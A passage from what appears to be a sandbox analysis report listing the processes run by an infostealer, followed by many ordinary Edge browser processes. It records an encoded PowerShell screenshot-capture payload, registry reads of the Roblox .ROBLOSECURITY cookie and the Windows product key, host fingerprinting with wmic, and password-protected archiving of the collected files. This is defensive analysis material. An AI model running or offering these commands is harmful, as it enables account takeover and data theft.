      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2872
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\typ41axu\typ41axu.cmdline"
        5⤵
        
        PID:3380
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES789B.tmp" "c:\Users\Admin\AppData\Local\Temp\typ41axu\CSC9EFD9501379047579E73425FEC7B0FA.TMP"
        6⤵
        
        PID:392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1844
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2644
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3484
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2512
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1256
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:740
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2568
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4276
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:956
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1476
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:2836
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI35082\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\PQazB.zip" *"
    3⤵
    PID:1256
  - - C:\Users\Admin\AppData\Local\Temp\_MEI35082\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI35082\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\PQazB.zip" *
      4⤵
      Executes dropped EXE
      PID:1660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1268
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1496
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2584
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:5044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3908
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1560
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3144

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd09613cb8,0x7ffd09613cc8,0x7ffd09613cd8
  2⤵
  PID:3780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1876 /prefetch:2
  2⤵
  PID:3048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2748 /prefetch:8
  2⤵
  PID:1972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:4180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
  2⤵
  PID:248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4616 /prefetch:1
  2⤵
  PID:3824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4596 /prefetch:1
  2⤵
  PID:2400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:1
  2⤵
  PID:4744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3816 /prefetch:1
  2⤵
  PID:1352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1
  2⤵
  PID:2544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
  2⤵
  PID:4816
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5812 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1
  2⤵
  PID:1824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
  2⤵
  PID:4696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
  2⤵
  PID:680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:1
  2⤵
  PID:1660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
  2⤵
  PID:3364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
  2⤵
  PID:656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6480 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3808 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:1
  2⤵
  PID:6128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:1
  2⤵
  PID:6140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6920 /prefetch:1
  2⤵
  PID:5228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6932 /prefetch:1
  2⤵
  PID:5304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7112 /prefetch:1
  2⤵
  PID:2924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7040 /prefetch:1
  2⤵
  PID:2748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6784 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:5948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
  2⤵
  PID:5400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7136 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1
  2⤵
  PID:4220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
  2⤵
  PID:2580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
